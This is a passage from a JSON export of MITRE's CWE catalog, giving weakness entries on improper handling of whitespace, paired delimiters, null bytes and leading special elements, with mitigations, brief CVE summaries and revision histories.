Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"Can overlap other separator characters or delimiters.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Whitespace","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Whitespace","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Whitespace","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Whitespace","attr":{"@_Date":"2010-04-05"}}]}},"157":{"attr":{"@_ID":"157","@_Name":"Failure to Sanitize Paired Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle the characters that are used to mark the beginning and ending of a group of entities, such as parentheses, brackets, and braces.","Extended_Description":{"xhtml:p":"Paired delimiters might include:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["&lt; and &gt; angle brackets","( and ) parentheses","{ and } braces","[ and ] square brackets","\\" \\" double quotes","\' \' single quotes"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that grouping elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0956","Description":"Crash via missing paired delimiter (open double-quote but no closing double-quote).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0956"},{"Reference":"CVE-2000-1165","Description":"Crash via message without closing \\"&gt;\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1165"},{"Reference":"CVE-2005-2933","Description":"Buffer overflow via mailbox name with an opening double quote but missing a closing double quote, causing a larger copy than expected.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2933"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Grouping Element / Paired Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"15"}}},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Grouping Element / Paired Delimiter","attr":{"@_Date":"2008-04-11"}}}},"158":{"attr":{"@_ID":"158","@_Name":"Improper Neutralization of Null Byte or NUL Character","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes NUL characters or null bytes when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected NUL character or null byte may cause the software to believe the input is terminated earlier than it actually is, or otherwise cause the input to be misinterpreted. This could then be used to inject potentially dangerous input that occurs after the null byte or otherwise bypass validation routines and other protection mechanisms.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that null characters or null bytes will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1284","Description":"NUL byte in theme name causes directory traversal impact to be worse","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1284"},{"Reference":"CVE-2005-2008","Description":"Source code disclosure using trailing null.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2008"},{"Reference":"CVE-2005-3293","Description":"Source code disclosure using trailing null.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3293"},{"Reference":"CVE-2005-2061","Description":"Trailing null allows file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2061"},{"Reference":"CVE-2002-1774","Description":"Null character in MIME header allows detection bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1774"},{"Reference":"CVE-2000-0149","Description":"Web server allows remote attackers to view the source code for CGI programs via a null character (%00) at the end of a URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0149"},{"Reference":"CVE-2000-0671","Description":"Web server earlier allows allows remote attackers to bypass access restrictions, list directory contents, and read source code by inserting a null character (%00) in the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0671"},{"Reference":"CVE-2001-0738","Description":"Logging system allows an attacker to cause a denial of service (hang) by causing null bytes to be placed in log messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0738"},{"Reference":"CVE-2001-1140","Description":"Web server allows source code for executable programs to be read via a null character (%00) at the end of a request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1140"},{"Reference":"CVE-2002-1031","Description":"Protection mechanism for limiting file access can be bypassed using a null character (%00) at the end of the directory name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1031"},{"Reference":"CVE-2002-1025","Description":"Application server allows remote attackers to read JSP source code via an encoded null byte in an HTTP GET request, which causes the server to send the .JSP file unparsed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1025"},{"Reference":"CVE-2003-0768","Description":"XSS protection mechanism only checks for sequences with an alphabetical character following a (&lt;), so a non-alphabetical or null character (%00) following a &lt; may be processed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0768"},{"Reference":"CVE-2004-0189","Description":"Decoding function in proxy allows regular expression bypass in ACLs via URLs with null characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0189"},{"Reference":"CVE-2005-3153","Description":"Null byte bypasses PHP regexp check (interaction error).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3153"},{"Reference":"CVE-2005-4155","Description":"Null byte bypasses PHP regexp check (interaction error).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4155"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Null Character / Null Byte"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":28,"Entry_Name":"Null Byte Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;NUL Character Injection&#34;, Page 411"}}},"Notes":{"Note":{"#text":"This can be a factor in multiple interpretation errors, other interaction errors, filename equivalence, etc.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Null Character / Null Byte","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Null Character / Null Byte","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Null Byte or NUL Character","attr":{"@_Date":"2010-04-05"}}]}},"159":{"attr":{"@_ID":"159","@_Name":"Improper Handling of Invalid Use of Special Elements","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly filter, remove, quote, or otherwise manage the invalid use of special elements in user-controlled input, which could cause adverse effect on its behavior and integrity.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Common Special Element Manipulations"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":[{"#text":"The list of children for this entry is far from complete. However, the types of special elements might be too precise for use within CWE.","attr":{"@_Type":"Maintenance"}},{"#text":"Precise terminology for the underlying weaknesses does not exist. Therefore, these weaknesses use the terminology associated with the manipulation.","attr":{"@_Type":"Terminology"}},{"#text":"Customized languages and grammars, even those that are specific to a particular product, are potential sources of weaknesses that are related to special elements. However, most researchers concentrate on the most commonly used representations for data transmission, such as HTML and SQL. Any representation that is commonly used is likely to be a rich source of weaknesses; researchers are encouraged to investigate previously unexplored representations.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Maintenance_Notes, Other_Notes, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":[{"#text":"Common Special Element Manipulations","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Special Element","attr":{"@_Date":"2020-02-24"}}]}},"160":{"attr":{"@_ID":"160","@_Name":"Improper Neutralization of Leading Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes leading special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled leading special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that leading special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Leading Special Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Leading Special Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Leading Special Element","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Leading Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"161":{"attr":{"@_ID":"161","@_Name":"Improper Neutralization of Multiple Leading Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple leading special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled multiple leading special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"160","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that multiple leading special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. 